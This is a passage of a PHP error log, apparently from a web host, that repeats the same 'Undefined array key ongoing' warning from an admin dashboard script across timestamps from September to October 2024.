/home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:59:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:00:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:14:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:21:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:28:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:30:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:44:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:44:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:46:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:50:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:06:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:17:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:17:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:17:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:22:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:25:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:34:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:35:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:45:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:59:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:16:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:27:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:27:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:30:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:36:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 15:33:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 17:37:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Sep-2024 11:09:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Sep-2024 13:56:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Sep-2024 15:06:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 11:27:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 12:43:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 13:02:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 15:27:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 15:29:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 16:22:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Sep-2024 23:21:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 01:27:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:27:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:30:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:31:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:32:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:35:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 09:33:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 11:13:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 12:19:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 12:48:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 13:29:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 13:39:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 14:09:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 14:54:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 15:44:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 16:23:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 16:27:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 17:16:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 17:47:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 18:20:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 18:33:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 23:37:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 23:37:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 00:52:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 05:19:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 05:21:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 08:53:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 11:20:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 14:35:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 14:40:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:41:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:41:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:44:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:52:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:21:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:25:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:33:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 16:38:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 17:16:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 18:15:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 18:37:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 18:43:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 20:16:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 22:28:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 22:41:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 23:36:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 23:36:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 09:47:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 10:50:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 11:28:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:17:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:21:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:24:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:24:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:24:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:26:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:28:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:28:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 12:52:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:06:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:33:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:34:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:37:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:39:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 13:39:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 14:10:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 15:37:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 15:40:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 16:27:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 16:42:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [25-Sep-2024 16:57:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 09:01:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 10:02:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 11:03:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 11:59:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 13:08:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Sep-2024 15:09:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 17:25:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 17:28:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 17:42:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 21:51:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:06:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:25:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:26:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:30:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Sep-2024 22:32:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 12:18:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 12:27:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 13:48:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 13:51:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 13:54:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:17:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:19:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:29:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 14:47:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 15:49:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 15:59:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:03:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:07:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:13:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:14:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Sep-2024 16:26:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 10:51:56 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 11:04:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 12:20:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 13:51:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 15:44:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 21:10:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Sep-2024 22:09:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 08:53:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 09:00:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 10:40:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 12:33:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 13:03:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 13:56:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 16:04:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 19:09:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 19:10:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 22:25:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [01-Oct-2024 22:56:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 10:15:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 11:29:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 12:13:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 13:02:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 13:59:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 14:07:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 14:16:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 16:05:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Oct-2024 18:22:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 13:43:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 13:48:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 14:58:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 16:30:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Oct-2024 19:23:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 12:16:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 12:28:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 18:47:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Oct-2024 19:30:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Oct-2024 17:40:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Oct-2024 17:40:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 08:53:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 